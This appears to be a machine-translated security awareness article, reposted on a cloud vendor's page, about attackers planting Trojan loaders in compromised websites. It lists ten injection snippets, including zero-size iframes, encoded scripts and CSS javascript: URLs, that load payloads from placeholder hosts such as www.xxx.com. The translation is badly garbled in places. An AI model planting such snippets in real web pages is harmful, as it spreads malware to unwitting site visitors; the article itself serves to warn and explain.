Horse code page Hanging Horse Analysis _ Vulnerability Research

Source: Internet
Author: User
Internet users today can be regarded as scary, in the face of viruses, perhaps anti-virus software can also prevent one or two, but if you encounter the Web page hanging horse behavior, or even directly to the user's current machine installed anti-virus software directly forcibly shut down, then its consequences is self-evident. Today's Web page has a horse behavior is not as simple as before, and even do not appear download prompts, directly from the background to download the running of their horses, and then secretly collect user information and collapse to the hands of malicious people.
NET horse harm
If a normal network server by a malicious user intrusion, its web page was Hung horse, to a certain extent, it can be said that the Web page has been tampered with, the harm is enormous, with the increase in user access to traffic, will cause the spread of this horse more and more, because of its relatively strong concealment, Lead to a lot of anti-virus software is not updated in a timely manner by the users unknowingly suffered. For the server, on the one hand, the bandwidth and system resources occupy a huge, on the other hand led to the server to become the source of the Trojan, become puppet accomplice, seriously affect the credibility of the website. For the injured netizens, the security of personal data information will become the public target, its electronic bank account and password, game account and password, mailbox account and password, qq/msn account number and password are no longer secure.

Common means of hanging horses
At present, the use of Web Trojan attack has become a popular malicious user attack means, should be caused by the vast numbers of netizens and the site enough attention! The following are the common types of Web page hanging horses:

One, body hanging horse: <body ></body>

Second, frame hanging Horse: <iframe src= address width=0 height=0></iframe>

Third, JS deformation encryption: <script language= "Jscript.encode" Src=http://www.xxx.com/muma.txt></script>muma.txt can be changed to any suffix.

Four, the CSS hanging horse: body {background-image:url (' Javascript:document.write ("<script src=http://www. Xxx.net/muma.js></script> ")}

Five, concealed hangs the horse: Top.document.body.innerHTML = Top.document.body.innerHTML + ' rn<iframe src= "http://www.xxx.com/muma.htm/" ></iframe> '

Six, js file hanging Horse: First the following code document.write ("<iframe width= ' 0 ' height= ' 0 ' src= ' address ' ></iframe>");
Save As Xxx.js, then JS hanging Horse code for <script Language=javascript src=xxx.js></script>

Seven, picture camouflage:
<iframe src= "net horse address" height=0 width=0></iframe>
</center>

Eight, JavaScript hanging horse:
<script language=javascript>
window.open ("Address", "", "Toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1 ");
</script>

Nine, disguise call:
<frameset rows= "444,0" cols= "*" >
<frame src= "Open Web page" framborder= "no" scrolling= "Auto" noresize marginwidth= "0" margingheight= "0" >
<frame src= "Net ma address" frameborder= "no" scrolling= "no" noresize marginwidth= "0" margingheight= "0" >
</frameset>

Ten, Advanced Deception:
<a href= "http://www.163.com (confuse connection address, show this address to point to Trojan address)" > page to display the content </a>
<script language= "JavaScript" >
function www_163_com ()
{
var url= "net horse address";
Open (URL, "NewWindow", "Toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,"
Resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10 ");
}

The above several although listed the common way of the Web Trojan is stationed, but over time, these ways of hanging horses will evolve into a variety of forms, designed to steal different secrets with links to malicious user-specified Trojans that contain pages to download more Trojan virus cholera infected computers, making it a new virus Trojan carrier source, So as to create conditions for a new round of infection.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.